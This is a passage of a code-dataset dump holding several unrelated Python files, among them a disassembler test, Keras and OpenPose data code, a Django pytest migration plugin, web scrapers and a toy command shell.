divs:\n\n name = row.find({\"name\":\"store-location\"}).text\n address = row.find({\"name\":\"store-address\"}).text\n location = 
geolocator.geocode(address)\n        tel = div.find({\"name\":\"store-tel\"}).text\n        time = div.find({\"name\":\"store-description\"}).text\n        print(name)\n        \n        csvwriter.writerow([name,address,location.latitude,location.longitude,tel, time])","sub_path":"cases_data/food_center_info/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"118971912","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nfrom disasm import instruction_encoding\n\nimport unittest\n\n\nclass Test__LEA_8d(unittest.TestCase):\n\n    def test_LEA_8d(self):\n        buf = b\"\\x48\\x8d\\x45\\xe7\"\n        instruction = instruction_encoding.decode(buf)\n        self.assertEqual(str(instruction), \"LEA RAX, [RBP -19h]\")\n        self.assertEqual(len(instruction), 4)\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"test/test8d.py","file_name":"test8d.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"510470050","text":"import json\nimport os\nimport cv2\nimport numpy as np\nimport random\nimport pprint\nimport sys\nfrom os.path import dirname,realpath\n\ndir_path = dirname(realpath(__file__))\n\nproject_path = realpath(dir_path + \"/..\")\n\nlibs_dir_path = project_path + \"/openpose\"\nsys.path.append(libs_dir_path)\n\nfrom openpose import poseEstimation\n\ndef get_frames(video_path, frames_per_step, segment, im_size, sess):\n\n    # load the video and acquire its parameters using opencv\n\n    video = cv2.VideoCapture(video_path)\n    fps = video.get(cv2.CAP_PROP_FPS)\n    video.set(cv2.CAP_PROP_POS_AVI_RATIO,1)\n    max_len = video.get(cv2.CAP_PROP_POS_MSEC) / 1000\n\n    # check segment consistency\n\n    if max_len < segment[1]:\n\n        segment[1] = max_len\n\n    # define start frame\n\n    central_frame = (np.linspace(segment[0], segment[1], num=3)) / 1000 *fps\n\n    start_frame = central_frame[1] - frames_per_step / 2\n\n    # for every frame in the clip extract frame, compute pose and insert the\n    # result in the array\n\n    frames = np.zeros(shape=(frames_per_step, im_size, im_size, 3), dtype=float)\n\n\n    for z in range(frames_per_step):\n\n        frame = start_frame + z\n        video.set(1, frame)\n\n        ret, im = video.read()\n\n        pose_frame = poseEstimation.compute_pose_frame(im, sess)\n\n        res = cv2.resize(pose_frame, dsize=(im_size, im_size),\n                         interpolation=cv2.INTER_CUBIC)\n\n        frames[z,:,:,:] = res\n\n    return frames\n\ndef read_clip_label(Batch_size,frames_per_step,im_size,sess):\n    batch = np.zeros(shape=(Batch_size,frames_per_step,im_size,im_size,3),dtype=float)\n    labels = np.zeros(shape=(Batch_size),dtype=int)\n\n    for s in range(Batch_size):\n        entry_name = random.choice(list(Json_dict.keys()))\n        training_entry = random.choice(Json_dict[entry_name])\n\n        path = entry_to_path[entry_name]\n\n        segment = training_entry['millisecond']\n\n        clip = get_frames(path, frames_per_step, segment, im_size, sess)\n        batch[s,:,:,:,:] = clip\n        labels[s] = label_to_id[training_entry['label']]\n\n    return batch,labels\n","sub_path":"dataset_manager.py","file_name":"dataset_manager.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"568755134","text":"import inspect\n\nfrom tinychain import op, ref\nfrom tinychain.state import State\nfrom tinychain.util import form_of, to_json, uri, Context, URI\nfrom tinychain.value import Nil, Value\n\nfrom . 
import resolve_class\n\n\nEMPTY = inspect.Parameter.empty\n\n\nclass Method(object):\n __uri__ = uri(op.Op)\n\n def __init__(self, header, form, name):\n self.header = header\n self.form = form\n self.name = name\n\n def __json__(self):\n return {str(uri(self)): to_json(form_of(self))}\n\n def dtype(self):\n return self.__class__.__name__\n\n\nclass Get(Method):\n __uri__ = uri(op.Get)\n\n def __call__(self, key=None):\n rtype = inspect.signature(self.form).return_annotation\n rtype = resolve_class(self.form, rtype, Nil)\n return rtype(ref.Get(uri(self.header).append(self.name), key))\n\n def __form__(self):\n sig = inspect.signature(self.form)\n parameters = list(sig.parameters.items())\n\n if len(parameters) < 1 or len(parameters) > 3:\n raise ValueError(f\"{self.dtype()} takes 1-3 arguments: (self, cxt, key)\")\n\n args = [self.header]\n\n cxt = Context()\n if len(parameters) > 1:\n _check_context_param(parameters[1])\n args.append(cxt)\n\n key_name = \"key\"\n if len(parameters) == 3:\n key_name, param = parameters[2]\n dtype = resolve_class(self.form, param.annotation, Value)\n args.append(dtype(URI(key_name)))\n\n cxt._return = self.form(*args) # populate the Context\n return key_name, cxt\n\n\nclass Put(Method):\n __uri__ = uri(op.Put)\n\n def __call__(self, key, value):\n return ref.Put(uri(self.header).append(self.name), key, value)\n\n def __form__(self):\n sig = inspect.signature(self.form)\n parameters = list(sig.parameters.items())\n if len(parameters) > 4:\n raise ValueError(\"a PUT method has a maximum of four parameters\")\n\n args = [self.header]\n\n cxt = Context()\n if len(parameters) > 1:\n _check_context_param(parameters[1])\n args.append(cxt)\n\n key_name = \"key\"\n value_name = \"value\"\n\n if len(parameters) == 3:\n name, param = parameters[2]\n if name == key_name:\n dtype = resolve_class(self.form, param.annotation, Value)\n args.append(dtype(URI(key_name)))\n elif name == value_name:\n dtype = resolve_class(self.form, param.annotation, State)\n args.append(dtype(URI(value_name)))\n else:\n raise ValueError(\n f\"a PUT method with three parameters must specify either 'key' or 'value', not '{name}'\")\n\n if len(parameters) == 4:\n key_name, param = parameters[2]\n dtype = resolve_class(self.form, param.annotation, Value)\n args.append(dtype(URI(key_name)))\n\n value_name, param = parameters[3]\n dtype = resolve_class(self.form, param.annotation, State)\n args.append(dtype(URI(value_name)))\n\n cxt._return = self.form(*args)\n return key_name, value_name, cxt\n\n\nclass Post(Method):\n __uri__ = uri(op.Post)\n\n def __call__(self, **params):\n rtype = inspect.signature(self.form).return_annotation\n rtype = resolve_class(self.form, rtype, Nil)\n return rtype(ref.Post(uri(self.header).append(self.name), **params))\n\n def __form__(self):\n sig = inspect.signature(self.form)\n parameters = list(sig.parameters.items())\n\n if len(parameters) == 0:\n raise ValueError(f\"{self.dtype()} has at least one argument: (self, cxt, name1=val1, ...)\")\n\n args = [self.header]\n\n cxt = Context()\n if len(parameters) > 1:\n _check_context_param(parameters[1])\n args.append(cxt)\n\n kwargs = {}\n for name, param in parameters[2:]:\n dtype = resolve_class(self.form, param.annotation, State)\n kwargs[name] = dtype(URI(name))\n\n cxt._return = self.form(*args, **kwargs)\n return cxt\n\n\nclass Delete(Method):\n __uri__ = uri(op.Delete)\n\n def __call__(self, key=None):\n return ref.Delete(uri(self.header).append(self.name), key)\n\n def __form__(self):\n return 
Get.__form__(self)\n\n\ndef _check_context_param(parameter):\n _name, param = parameter\n if param.annotation == EMPTY or param.annotation == Context:\n pass\n else:\n raise ValueError(\n f\"a method definition takes a transaction context as its second parameter, not {param.annotation}\")\n","sub_path":"client/tinychain/reflect/method.py","file_name":"method.py","file_ext":"py","file_size_in_byte":4615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"595703480","text":"import logging\nimport argparse\nimport pickle\nimport math\nfrom tqdm import tqdm\nimport numpy as np\nfrom keras.layers import Input, CuDNNLSTM, LSTM, BatchNormalization, Activation, Dense, Dropout\nfrom keras.optimizers import Adam\nfrom keras.regularizers import l2\nfrom keras.models import Model\nfrom keras.initializers import RandomNormal, Orthogonal, Ones, Zeros, glorot_uniform\nfrom keras.utils import plot_model\nfrom sklearn.model_selection import KFold, train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn import metrics\nfrom utils import custom_load, custom_load_multitask, mean_absolute_percentage_error\n\ndef create_model(\n input_dim,\n dnn_layer,\n lambda_c=1,\n lambda_w=1,\n dropout_rate=0.1,\n activation='relu',\n optimizer=Adam(lr=0.001)):\n\n assert(dnn_layer[-1] == 1)\n dnn_input_layer = Input((input_dim,), name=\"input\")\n dnn_output_layer = dnn_input_layer\n for dim in dnn_layer:\n dnn_output_layer = Dense(dim, kernel_initializer=RandomNormal(mean=0.0, stddev=0.05), kernel_regularizer=l2(lambda_w), bias_regularizer=l2(lambda_w))(dnn_output_layer)\n dnn_output_layer = Dropout(dropout_rate)(dnn_output_layer)\n dnn_output_layer = BatchNormalization()(dnn_output_layer)\n dnn_output_layer = Activation(activation)(dnn_output_layer)\n\n model = Model(inputs=dnn_input_layer, outputs=dnn_output_layer, name=\"DNN_REGRESSOR\")\n model.compile(optimizer=optimizer, loss='mse', loss_weights=[lambda_c])\n return model\n\ndef main(args):\n X_train, y_train, X_test, y_test = custom_load_multitask(\n train='./data/1234.csv', test='./data/2345.csv', label_length=1,\n min_matches_cnt=5, label='damage_dealt_avg')\n\n logging.info('Train Dataset shape: %s' % str(X_train.shape))\n logging.info('Test Dataset shape: %s' % str(X_test.shape))\n\n\n scaler = StandardScaler()\n X_train = scaler.fit_transform(X_train)\n X_test = scaler.transform(X_test)\n\n model = create_model(\n input_dim=X_train.shape[1],\n dnn_layer=[20, 10, 1],\n lambda_c=10,\n lambda_w=5,\n dropout_rate=0.5,\n optimizer=Adam(lr=0.01),\n activation='relu',)\n\n model.summary()\n\n model.fit(\n x=X_train, y=y_train,\n validation_data=(X_test, y_test),\n batch_size=32,\n epochs=150,\n verbose=1,)\n \n error = mean_absolute_percentage_error(y_test, model.predict(X_test))\n print(\"MAPE: %f\" % error)\n \nif __name__ == \"__main__\":\n logging.basicConfig(\n format=\"[%(levelname)s] %(message)s\",\n handlers=[\n logging.FileHandler(\"./logs/tuning.log\"),\n logging.StreamHandler()\n ],\n level=logging.INFO\n )\n \n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--file_path', type=str, default=\"./data/data-common-0-43000.csv\")\n args = parser.parse_args()\n \n main(args)\n","sub_path":"src/DNN_regressor.py","file_name":"DNN_regressor.py","file_ext":"py","file_size_in_byte":2933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"251657915","text":"from bs4 import BeautifulSoup\r\nimport urllib.request\r\nimport 
time\r\nimport datetime\r\n\r\ndata_filename = 'queue_data_' + str(datetime.datetime.now().date()) + '.csv'\r\nurl = \"http://reporting.int.godaddy.com/wallboard/ccqueues-international.aspx?UTCOffset=1&Skilltargets=5007|10176\"\r\ntime_limit = datetime.time(17, 30, 0, 0)\r\nrefresh_rate = 15 #seconds\r\n\r\nprint('info : current time is ' + str(datetime.datetime.now()))\r\nprint('info : file name is ' + data_filename)\r\n\r\nwhile datetime.datetime.time(datetime.datetime.now()) < time_limit:\r\n try:\r\n page = urllib.request.urlopen(url)\r\n except urllib.error.URLError:\r\n print('error: url could not be reached')\r\n break\r\n\r\n # parse the page with beautifulsoup\r\n soup = BeautifulSoup(page, 'html.parser')\r\n\r\n # Get the values from the html tab\r\n name_box = [my_tag.text for my_tag in soup.find_all('td', attrs={'class': 'statWhite'})]\r\n\r\n # Let's write to the file\r\n temporary_string = (str(name_box[0]) + ',' + str(name_box[1]) + ',' +\r\n str(name_box[2]) + ',' + str(datetime.datetime.now()))\r\n\r\n file = open(data_filename, 'a')\r\n file.write(temporary_string + '\\n')\r\n print('info : ' + temporary_string)\r\n file.close()\r\n \r\n time.sleep(refresh_rate)\r\n\r\n# close the file\r\nprint('info : time limit exceeded')\r\nprint('info : open graph.py to generate report')\r\n\r\ninput()","sub_path":"queue/scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"317837373","text":"import sys\nimport json\n\n\nif __name__ == '__main__':\n scanId1 = int(sys.argv[1])\n key = \"scanId\"\n #print(scanId)\n file = open(\"./site-assets.json\",\"rt\")\n #file = open(\"./site-assets1.json\",\"rt\")\n content = file.read()\n content1 = json.loads(content)[\"resources\"]\n file.close()\n #print(content)\n for obj1 in content1:\n for obj2 in obj1[\"history\"]:\n if key in obj2.keys(): \n if (((obj2[\"scanId\"] == scanId1 ) and (obj1[\"vulnerabilities\"][\"critical\"] > 0)) or ((obj2[\"scanId\"] == scanId1 ) and (obj1[\"vulnerabilities\"][\"severe\"] > 0)) ):\n print(obj1[\"ip\"])","sub_path":"R7_Scanning/generate_report/files/parse-json.py","file_name":"parse-json.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"79870213","text":"from os.path import basename\nfrom PIL.ImageTk import PhotoImage\nfrom pyviews.core.ioc import inject\nfrom pykomcore.grid.geometry import ColumnsSetup, CanvasGridGeometry\nfrom pykomcore.grid.viewmodel import GridViewModel, ItemViewModel, ColumnViewModel\n\nclass PanelViewModel(GridViewModel):\n def __init__(self):\n super().__init__()\n self.path = None\n self.grid = _create_files_grid()\n\ndef _create_files_grid():\n geometry = CanvasGridGeometry(ColumnsSetup([16, \"*\", 70]), 25)\n columns = [\n ColumnViewModel('image', PhotoImage, ''),\n ColumnViewModel('name'),\n ColumnViewModel('size')\n ]\n\n return GridViewModel(geometry, columns, 'name')\n\nclass EntryViewModel(ItemViewModel):\n def __init__(self, path, name=None):\n super().__init__()\n self.name = name if name else basename(path)\n self.path = path\n self.size = None\n self.is_dir = False\n self._add_key('image')\n\n @property\n @inject('get_icon')\n def image(self, get_icon):\n return get_icon(self.path)\n\n @property\n def search_key(self):\n return 
self.name\n","sub_path":"src/plugins/files/viewmodel/viewmodel.py","file_name":"viewmodel.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"514422063","text":"from setuptools import setup, find_packages\nimport glob\nimport re\n\ndef requires():\n    \"\"\" gets packages from requirements.txt \"\"\"\n    with open('requirements.txt') as infile:\n        return infile.read().splitlines()\n\n## Auto-update PIED version from git repo tag\n# Fetch version from git tags, and write to version.py.\n# Also, when git is not available (PyPi package), use stored version.py.\nINITFILE = \"PIED/__init__.py\"\nCUR_VERSION = re.search(r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\",\n                        open(INITFILE, \"r\").read(),\n                        re.M).group(1)\n\nsetup(\n    name=\"PIED\",\n    version=CUR_VERSION,\n    url=\"https://github.com/isaacovercast/PIED\",\n    author=\"Isaac Overcast\",\n    author_email=\"isaac.overcast@gmail.com\",\n    description=\"Phylogeographic Temporal Analysis\",\n    long_description=open('README.md').read(),\n    packages=find_packages(), \n    install_requires=requires(),\n    entry_points={\n        'console_scripts': [\n            'PIED = PIED.__main__:main',\n        ],\n    },\n    license='GPL',\n    classifiers=[\n        'Programming Language :: Python',\n        'Programming Language :: Python :: 3',\n        'Programming Language :: Python :: 3.7',\n    ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"476288756","text":"from typing import Optional\n\nimport pytest\nfrom django.db import DEFAULT_DB_ALIAS\n\n\n@pytest.fixture()\ndef migrator_factory(request, transactional_db, django_db_use_migrations):\n    \"\"\"\n    Pytest fixture to create migrators inside the pytest tests.\n\n    How? Here's an example.\n\n    .. code:: python\n\n        @pytest.mark.django_db\n        def test_migration(migrator_factory):\n            migrator = migrator_factory('custom_db_alias')\n            old_state = migrator.apply_initial_migration(('main_app', None))\n            new_state = migrator.apply_tested_migration(\n                ('main_app', '0001_initial'),\n            )\n\n            assert isinstance(old_state, ProjectState)\n            assert isinstance(new_state, ProjectState)\n\n    Why do we import :class:`Migrator` inside the fixture function?\n    Otherwise, coverage won't work correctly during our internal tests.\n    Why? Because modules in Python are singletons.\n    Once imported, they will be stored in memory and reused.\n\n    That's why we cannot import ``Migrator`` on a module level.\n    Because it won't be caught by coverage later on.\n    \"\"\"\n    from django_test_migrations.migrator import Migrator  # noqa: WPS433\n\n    if not django_db_use_migrations:\n        pytest.skip('--nomigrations was specified')\n\n    def factory(database_name: Optional[str] = None) -> Migrator:\n        migrator = Migrator(database_name)\n        request.addfinalizer(migrator.reset)  # noqa: PT021\n        return migrator\n    return factory\n\n\n@pytest.fixture()\ndef migrator(migrator_factory):  # noqa: WPS442\n    \"\"\"\n    Useful alias for ``'default'`` database in ``django``.\n\n    That's a predefined instance of a ``migrator_factory``.\n\n    How to use it? Here's an example.\n\n    .. 
code:: python\n\n        @pytest.mark.django_db\n        def test_migration(migrator):\n            old_state = migrator.apply_initial_migration(('main_app', None))\n            new_state = migrator.apply_tested_migration(\n                ('main_app', '0001_initial'),\n            )\n\n            assert isinstance(old_state, ProjectState)\n            assert isinstance(new_state, ProjectState)\n\n    Just one step easier than ``migrator_factory`` fixture.\n    \"\"\"\n    return migrator_factory(DEFAULT_DB_ALIAS)\n","sub_path":"django_test_migrations/contrib/pytest_plugin.py","file_name":"pytest_plugin.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"295183076","text":"#import colorama\nimport sys \nimport os\nclass bcolors:\n    HEADER = '\\033[95m'\n    BLUE = '\\033[94m'\n    GREEN = '\\033[92m'\n    CEND = '\\33[0m'\n    CBOLD = '\\33[1m'\n    CITALIC = '\\33[3m'\n    CURL = '\\33[4m'\n    CBLINK = '\\33[5m'\n    CBLINK2 = '\\33[6m'\n    CSELECTED = '\\33[7m'\n    CBLACK = '\\33[30m'\n    CRED = '\\33[31m'\n    CGREEN = '\\33[32m'\n    CYELLOW = '\\33[33m'\n    CBLUE = '\\33[34m'\n    CVIOLET = '\\33[35m'\n    CBEIGE = '\\33[36m'\n    CWHITE = '\\33[37m'\n    CBLACKBG = '\\33[40m'\n    CREDBG = '\\33[41m'\n    CGREENBG = '\\33[42m'\n    CYELLOWBG = '\\33[43m'\n    CBLUEBG = '\\33[44m'\n    CVIOLETBG = '\\33[45m'\n    CBEIGEBG = '\\33[46m'\n    CWHITEBG = '\\33[47m'\n    CGREY = '\\33[90m'\n    CRED2 = '\\33[91m'\n    CGREEN2 = '\\33[92m'\n    CYELLOW2 = '\\33[93m'\n    CBLUE2 = '\\33[94m'\n    CVIOLET2 = '\\33[95m'\n    CBEIGE2 = '\\33[96m'\n    CWHITE2 = '\\33[97m'\n    CGREYBG = '\\33[100m'\n    CREDBG2 = '\\33[101m'\n    CGREENBG2 = '\\33[102m'\n    CYELLOWBG2 = '\\33[103m'\n    CBLUEBG2 = '\\33[104m'\n    CVIOLETBG2 = '\\33[105m'\n    CBEIGEBG2 = '\\33[106m'\n    CWHITEBG2 = '\\33[107m'\n    WARNING = '\\033[93m'\n    FAIL = '\\033[91m'\n    ENDC = '\\033[0m'\n    BOLD = '\\033[1m'\n    UNDERLINE = '\\033[4m'\nwelcome = print(\"\\x1b[93;1mwelcome\\x1b[0m\") \nprint(bcolors.CVIOLETBG + \"_____________________\\x1b[0m\")\n \n#def Err(command):\n    #print(bcolors.CRED2 +command+\" was not found...\" + bcolors.CRED2)\ndef name(string):\n    print(string)\ndef newLine():\n    pointer = input(\">\")\nwhile True:\n\n    pointer = input(\">\")\n    \n    if pointer == \"user\":\n        class user:\n            name = input('what is your user name:'), \n            password = input(\"what is your password:\")\n        print(\"\\x1b[92;1maccount information was made!\\x1b[0m\") \n    elif pointer == \"self\":\n        print(\"\\x1b[92;1moutput >>>\\x1b[0m\")\n        print(user.name)\n        \n    elif pointer == \"user -r -p\":\n        user.password = input(\"reset password>\")\n        print(\"\\x1b[92;1mpassword was switched!\\x1b[0m\")\n        \n    elif pointer == \"user -r\":\n        user.name = input(\"reset name>\")\n        user.password = input(\"reset password>\")\n        print(\"\\x1b[92;1maccount information reset!\\x1b[0m\") \n\n    elif pointer == \"--v\":\n        print(bcolors.BLUE + \"VERSION:\" + bcolors.BOLD + \"\\x1b[93;1mdev 1.0.0\\x1b[0m\") \n        \n    elif pointer == \"clear\":\n        os.system(\"clear\")\n        print(\"\\x1b[93;1mwelcome to a new page\\x1b[0m\")\n        print(bcolors.CVIOLETBG + \"_____________________\\x1b[0m\")\n        \n    elif pointer == \"MAKE_DIR\" or pointer == \"makeDIR\":\n        os.system(\"mkdir dir\")\n        name = input(\"name file>\")\n        os.rename(\"dir\", name)\n        print(\"\\x1b[92;1mfolder \"+name+\" was created!\\x1b[0m\")\n\n    elif pointer == \"CHANGE_wd\":\n        name = input(\"what directory>\")\n        os.chdir(name)\n        current = os.getcwd()\n        pathNow = str(current).split(\"/\")[4]\n        print(\"\\x1b[92;1myour working directory is \"+pathNow+\"\\x1b[0m\") \n        \n    elif pointer == \"SHOW_F\":\n        
print(\"\\x1b[92;1m output>>>\\x1b[0m\")\n        cwd = os.getcwd()\n        files = os.listdir(cwd)\n        print(files)\n        \n    elif pointer == \"--help\":\n        with open('helper.txt', 'r') as f:\n            for line in f:\n                print(line, end='') \n    #random stuff \n    elif pointer == \"Hello\":\n        print(\"Hello, how are you\")\n    elif pointer == \"Hello who are you?\":\n        print(\"I am you...\")\n    elif pointer == \"I'm bad\":\n        print(\"I'm sorry ):\")\n    elif pointer == \"I'm good\":\n        print(\"I'm glad to hear that (:\")\n    \n    elif pointer == '':\n        newLine = True\n    else:\n        print(\"NOT FOUND\")\n    \n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"472921479","text":"import requests\nimport os\nimport argparse\nimport re\nfrom frequency import FrequencyCreator, ArtistFrequency\nfrom db.db import *\nfrom bs4 import BeautifulSoup as bs\n\ndefaults = {\n    'api_token': os.environ.get(\"GENIUS_API_KEY\"),\n    'root_api_url': os.environ.get(\"GENIUS_ROOT_API_URL\")\n}\n\n\nclass GeniusAPI:\n    def __init__(self, artist):\n        self._endpoint = defaults['root_api_url'] + '/search'\n        self._headers = {'Authorization': 'Bearer ' +\n                         defaults['api_token']}\n        self._artist = artist\n\n    def get_lyrics(self):\n        page = 1\n        while page < 8:\n            data = {'q': self._artist, 'page': page}\n            api_response = requests.get(self._endpoint, data=data, headers=self._headers).json()\n            for potential_song in api_response['response']['hits']:\n                if self._artist.lower() in potential_song['result']['primary_artist']['name'].lower():\n                    song_found = potential_song\n                    song_url = song_found['result']['url']\n                    try:\n                        lyrics_to_save = self.scrape_lyrics(song_url)\n                        self.write_to_dir(lyrics_to_save,\n                                          song_found['result']['title'], self._artist)\n                    except:\n                        print('could not process lyrics for ' + song_found['result']['title'] + ' with url ' + song_url)\n                        continue\n\n            page += 1\n        print('All Songs for {} have been found. 
Program is now calculating the frequency of all words...'.format(\n            self._artist))\n        db = Mongo('lyrics-db')\n        songs_in_db = db.getSongArtistCount(self._artist)\n        if songs_in_db > 0:\n            artistFreq = ArtistFrequency(self._artist, db.getSongFrequency(self._artist))\n            artistFreq.createArtistLevelWordFrequency()\n\n    def scrape_lyrics(self, url):\n        web_page = requests.get(url)\n        html = bs(web_page.text, 'html.parser')\n        [h.extract() for h in html('script')]\n        lyrics = html.find('div', class_='lyrics').get_text()\n        return lyrics\n\n    def write_to_dir(self, lyrics, song, artist):\n        # remove special characters from artist and song\n        artist = artist.replace('/', '')\n        song = re.sub('[^a-zA-Z0-9 \\n\\.]', '', song)\n\n        if os.path.isdir('../lyrics_dir/{}'.format(artist)):\n            path_name = '../lyrics_dir/{}/{}.txt'.format(artist, song)\n            self.write_txt_file(lyrics, song, artist, path_name)\n            fc = FrequencyCreator(path_name)\n            frequency = fc.process_lyrics()\n            song_frequency = {'artist': artist, 'song': song, 'lyrics_freq': frequency}\n            db = Mongo('lyrics-db')\n            db.saveSongFrequency(song_frequency)\n        else:\n            os.makedirs('../lyrics_dir/{}'.format(artist))\n            path_name = '../lyrics_dir/{}/{}-{}.txt'.format(artist, song, artist)\n            self.write_txt_file(lyrics, song, artist, path_name)\n\n    def write_txt_file(self, lyrics, song, artist, path):\n        f = open(path, 'w')\n        f.write('Song: {}'.format(song) + '\\n')\n        f.write('Artist: {}'.format(artist) + '\\n')\n        f.write(lyrics)\n        f.close()\n","sub_path":"main/finder.py","file_name":"finder.py","file_ext":"py","file_size_in_byte":3255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"368106996","text":"# -*- coding: utf-8 -*-\nfrom django.utils.encoding import force_unicode\nfrom django.db import models\nfrom rest_framework import serializers\nfrom api.models.brand import Brand\n\n\nclass Product(models.Model):\n\n    PRODUCT_TYPES = (('coat','Coat'),('dress','Dress'),('jacket','Jacket'),('longsleeve','Longsleeve'),('overall', 'Overall'),('pullover','Pullover'),('shirt','Shirt'),\n                     ('skirt','Skirt'),('trousers','Trousers'),('bag', 'Bag'),('accessory', 'Accessory'),('shoes', 'Shoes'),('other','Other'))\n    GENDER = (('women','Women'),('men','Men'),('unisex','unisex'),)\n\n    created = models.DateTimeField(auto_now_add=True, blank=False)\n    updated = models.DateTimeField(auto_now=True, blank=True)\n    is_active = models.BooleanField(default=True, blank=True)\n\n    brand = models.ForeignKey(Brand, default=1, blank=False)\n    name = models.CharField(max_length=50, blank=False)\n    type = models.CharField(max_length=50, choices=PRODUCT_TYPES, blank=False)\n    target_group = models.CharField(max_length=6, default='unisex', choices=GENDER, blank=False)\n    description_de = models.TextField(max_length=500, blank=True, verbose_name='German description')\n    description_en = models.TextField(max_length=500, blank=True, verbose_name='English description')\n    description_it = models.TextField(max_length=500, blank=True, verbose_name='Italian description')\n\n    def __unicode__(self):\n        return force_unicode('%s %s %s %s' % (self.brand, self.type.title(), self.name, self.target_group))\n\n    class Meta:\n        ordering = ('-created',)\n        app_label = 'api'\n        verbose_name = 'Product'\n        verbose_name_plural = 'Products'\n\n\nclass Product_serializer(serializers.HyperlinkedModelSerializer):\n\n    def __unicode__(self):\n        return self.id\n\n    class Meta:\n        model = Product\n        fields = (\n            'created',\n            'updated',\n            'is_active',\n            'name',\n            'type',\n            'target_group',\n            
'description_de',\n            'description_en',\n            'description_it'\n        )\n","sub_path":"api/models/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"512940602","text":"import sys\nimport os\nfrom tqdm import *\nfrom multiprocessing import Pool\n\n#p = Pool(10)\n\n# split, stat, data, pdf_printer\nstages = [False, False, False, False]\n\nif \"all\" in sys.argv:\n    stages = [True, True, True, True]\nelse:\n    for i in range(1, 5):\n        if str(i) in sys.argv:\n            stages[i-1] = True\n\ndef filedelete(fname):\n    if os.path.exists(fname):\n        os.remove(fname)\n\nparameter = list(filter(lambda x: x.endswith(\".csv\"), sys.argv[1:]))[0]\n\naddon = list(filter(lambda x: x != \"all\" and len(x) > 1 and not x.endswith(\".csv\"), sys.argv[1:]))[0]\n\n# split\nif stages[0]:\n    os.system(\"python3 split.py \"+parameter+\" \"+addon)\n    print(\"Stage 1 (split) done.\")\nelse:\n    print(\"Stage 1 (split) skipped.\")\n\n# stat\nif stages[1]:\n    def run_stat(filename):\n        os.system(\"python3 stat.py data\" + addon + \"/\" + filename + \" \" + addon)\n    _, _, fn = next(os.walk(\"data\"+addon))\n    for f in tqdm(fn):\n        run_stat(f)\n    #p.map(run_stat, fn)\n    print(\"Stage 2 (stat) done.\")\nelse:\n    print(\"Stage 2 (stat) skipped.\")\n\n# data\nif stages[2]:\n    filedelete(\"results\"+addon+\"/all-data.csv\")\n    filedelete(\"results\"+addon+\"/pdf-params.csv\")\n    filedelete(\"results\"+addon+\"/pdf-params-double.csv\")\n    filedelete(\"results\"+addon+\"/gamma-pdf-params.csv\")\n    def run_data(filename):\n        if \"-acc-data.csv\" not in filename:\n            return\n        os.system(\"python3 data.py results\"+addon+\"/\" + filename + \" \" + addon)\n    _, _, fn = next(os.walk(\"results\"+addon))\n    for f in tqdm(fn):\n        run_data(f)\n    #p.map(run_data, fn)\n    os.chdir(\"results\" + addon)\n    os.system(\"../combine.sh\")\n    os.chdir(\"..\")\n    print(\"Stage 3 (data) done.\")\nelse:\n    print(\"Stage 3 (data) skipped.\")\n\n# pdf_printer\nif stages[3]:\n    os.system(\"python3 pdf_printer.py \"+addon)\n    print(\"Stage 4 (pdf_printer) done.\")\nelse:\n    print(\"Stage 4 (pdf_printer) skipped.\")\n\n","sub_path":"modeling/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"35184409","text":"#!/usr/bin/env python\n# -*- coding: utf8 -*-\n\n# ============================================================================\n# Copyright (c) 2013-2015 nexB Inc. http://www.nexb.com/ - All rights reserved.\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#     http://www.apache.org/licenses/LICENSE-2.0\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\n\"\"\"\nTool to generate component attribution based on a set of .ABOUT files. \n\nOptionally accepts a list (i.e. 
